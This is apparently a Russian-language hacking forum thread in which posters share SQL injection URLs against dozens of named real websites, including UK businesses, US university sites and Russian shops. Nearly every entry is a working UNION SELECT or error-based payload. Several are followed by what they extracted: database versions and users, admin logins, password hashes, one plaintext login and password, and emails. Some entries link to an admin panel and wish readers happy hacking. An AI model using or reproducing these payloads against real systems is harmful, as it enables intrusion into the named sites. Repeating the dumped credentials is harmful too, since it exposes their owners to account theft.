SQL Инъекции

хацкеры. таблица - admin , колонки - username, password

 

www.ateme.com

4.1.11-Debian_4sarge7-log: atemeweb@localhost: atemeweb

Опять не подобрал поля. Таблицы admin нету

 

http://www.creditman.biz/ The UK's Leading Resource for Businesses and Credit Professionals

Админ этого сайта параноик, мало того, что он насоздавал с десяток фейковых таблиц содержащих название admin, колонки с логинами и паролями и т.д. Его логин и пароль состоят из 64 символов каждый!!! Хотя с другой стороны с финансами связано...

Вывожу по отдельности, так как вместе не помещается при выводе:

Логин: $uC&b+bAz&!#+e@6*cR5yaHec-utr?th7kustuz&ZuDrusp6mAweswAcre7Wu3Ab

Code:

http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+username+from+Administration)--

Пароль: #r@kep*uX_th*b2xutRa52rey-paruna$ukeG5*Hep-phe9aj#swapeth7Phachu

Code:

http://www.creditman.biz/uk/members/news.asp?id=1+or+1=(SELECT+TOP+1+password+from+Administration)--

Админка: https://www.creditman.biz/uk/admin/default.asp

Удачного взлома=)

 

http://www.education.ex.ac.uk/dll/pages.php?id=-242+union+select+1,2,3,4,5,concat(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12/*


[email protected]:sell:4.1.20-log

а дальше непохек =\

 

http://www.sopka.net/?pg=1&id=106106&owner=-1+union+select+concat_ws(0x2F,version(),database(),user())/*

4.0.27-max-log/tiba102/[email protected]

-----------------------------------------------------------------------------

http://www.probilliard.info/news.php?id=-1+union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8,9,10,11/*

4.0.27-log/vh04971/[email protected]

-----------------------------------------------------------------------------

http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,version(),database(),user())/*

5.0.45-log/u33748/[email protected]



http://www.restoclub.ru/news/?news_id=-1'+union+select+concat_ws(0x2F,login,password)+from+u33748_otelrent.b_users+limit+0,1/*

логин/хеш в title
root/be601c6844923ee53211c35603ff0b52

 

Блин, представляете, все перебрал, а про admin забыл
Бывает иногда...

 

outertemple.com

[email protected]:tc1::5.0.32-Debian_7etch1

 

www.firstfordrivers.co.uk

5.0.24-standard-log:firstfordrivers_co_uk:first4drivers@localhost

sherry:586e56fa6ed25d6392861a85bccb45e6f64f8e86:10

Лимитом выводим остальных.

 

http://www.lunarenergy.co.uk/

Code:

http://www.lunarenergy.co.uk/newsDetail.php?id=-1+union+select+1,2,3,4,5,concat_ws(0x3a,convert(username+using+latin1),convert(password+using+latin1)),7+from+admin/*

scadesign:scadoo

http://www.warrenpointharbour.co.uk/

Code:

http://www.warrenpointharbour.co.uk/general.php?id=-1+union+select+1,2,3,4,convert(version()   +using+latin1),6,7,8,9,10,11/*

http://www.graysofwestminster.co.uk/

Code:

http://www.graysofwestminster.co.uk/newsitem.php?id=-1+union+select+1,convert(version()+usi   ng+latin1),3,4,5,6/*

http://www.newrowfarmnurseries.co.uk/

Code:

http://www.newrowfarmnurseries.co.uk/show_item.php?id=-1'+union+select+1,2,concat_ws(0x3   a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

http://www.inova.unicamp.br/

Code:

http://www.inova.unicamp.br/inovanosmunicipios/artigos_detail.php?id=-1+union+select+1,conca   t_ws(0x3a,user(),version(),database()),3,4,5,6/*

 

Какая то непонятная украинская CMS`ка FreshKnowledge

сайт CMS`ки:_http://www.freshknowledge.net/
сайт разработчика:_http://www.setlab.net/
уязвим форум, наверное там полно скулей, но копаться не стал, т.к. интереса особого не представляет

Code:

http://www.setlab.net/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

еще примеры:

Code:

http://www.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

Code:

http://youth.livinggod.org.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

Code:

http://streetball.future.com.ua/forum/?action=view_subject&subject_id=-6+union+select+1,user(),version(),4,5,6,7,8,9,10/*

 

edu

Вот опять по edu прошолся, прошу любить и жаловать:

www.gatech.edu Georgia Institute of Technology

Code:

http://www.gatech.edu/calendar/event.php?id=-2210%20UNION%20SELECT%201,2,3,4,5,VERSION(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*

5.0.37


www.history.msu.edu Department of History - Michigan State University

Code:

http://www.history.msu.edu/view_profile.php?id=-93%20UNION%20SELECT%201,2,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x203A20,VERSION(),USER(),DATABASE()),0x20),0x20),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/*

4.1.11-Debian_4sarge7-log : [email protected] : dpthistory2



www.montana.edu Montana State University

Code:

http://www.montana.edu/cpa/news/nwview.php?article=-5458%20UNION%20SELECT%201,VERSION(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

4.0.17

 

вот еще одна едушка:

Code:

 http://idl63.ils.unc.edu/chirag/Health/showmetadata.php?video_id=-1+union+select+1,2,3,4,5,6,7,8,9,database(),user(),12,version(),14,15,16,17,18,19,20/*

 

Code:

  http://travel-tourthailand.com/hotel_detail.php?id=-1+union+select+1,2,VERSION(),4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+member/*

Code:

http://www.adventureincostarica.com/zones.php?ID=-1+union+select+1,VERSION(),3/*

 

http://www.pyramid.spb.ru/content/news/default.asp?shmode=2&ids=1&ida=-1+or+1=@@version

Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

--------------------------------------------------------------------------
http://www.rus7.org/index.php?p=news&newid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2F,version(),database(),user())/*

4.0.27-max-log/utsport1_db01/[email protected]

--------------------------------------------------------------------------
http://www.combi-spb.ru/?module=news&id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5/*

4.0.26/u63709/[email protected]

--------------------------------------------------------------------------
echoperm.ru

http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,version(),database(),user()),4,5,6/*&part_id=2&class=news

4.1.20-log/echotest/echotest@localhost


http://www.echoperm.ru/article.php?id=-1+union+select+1,2,concat_ws(0x2F,username,user_password,user_email),4,5,6+from+phpbb_users/*&part_id=2&class=news

логин/хеш/мейл сразу все
admin/f609688322a2811966aeb9aca67e2557/[email protected]

 

Code:

http://www.silbersaiten.de/show_item.php?id=-111+union+select+1,2,concat(id,0x3a,name),4,5,6,7,8,9+from+content/*

Code:

http://www.visitloudoncounty.com/show_item.php?id=-26+union+select+1,2/*

Code:

http://www.gregsequipment.com/show_item.php?id=-61+union+select+1,2,3,4,5,6,7,8,9,10+from+INFORMATION_SCHEMA.TABLES/*

Code:

https://www.happyvalleyamishtraders.com/store/show_item.php?id=-116+union+select+1,2,3,4,VERSION(),6,7,8,9,10,11,12,13,14/*

Code:

http://moblog.co.uk/view.php?id=-77571+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49+from+mob_users/*

 

Code:

http://itsoft.ru/search/?search_query='&in_cat='

Code:

http://cs-server.ru/news/detail/?item_id='

 

Code:

http://mathinfo.montclair.edu/undergrad_research/profile.php?id=-48+union+select+1,concat(user(),0x3a,version(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

mathweb@localhost:4.0.18-standard-logmath

 

Code:

http://[B]www.gangrule.com[/B]/gangs.php?ID=-1+union+select+user()/*

oldtapes_gangrul@localhost
4.1.22-standard-log
oldtapes_gangrulecom

Code:

http://[B]www.fikb.it[/B]/news.asp?id=-1'

Errore SQL

Errore di run-time di Microsoft VBScript error '800a01a8'

Necessario oggetto: 'DBRecordSet(...)'

Code:

http://www.scamshield.com/Feature.asp?id=-1'

Code:

http://[B]www.anchem.ru[/B]/catalog/dirCat.asp?id=-1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'CAT_ID = -1'''.

/catalog/dirCat.asp, line 15

Code:

http://[B]www.r66-rabota.ru[/B]/post.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*

Code:

http://www.socket2000.com/index.asp?id=-1'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'category=-1' and active=true order by xdate desc'.

/includes/include_functions.asp, line 10

Code:

http://www.scamshield.com/Feature.asp?id=-1'

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'ArticleNumber = -1''.

/Feature.asp, line 21

 

Code:

http://ecodefense.ru/view.php?id=-503+union+select+1,2,3,4,5,6,7,8,9,VERSION(),11/*

Code:

http://www.hoglezoo.org/animals/view.php?id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49/*

 

Code:

http://[B]www.vikinggames.hu[/B]/product.php?id=-1+union+select+1,table_name,version(),4,user(),6,7+from+information_schema.tables/*

5.0.32-Debian_7etch1-log
viking1@localhost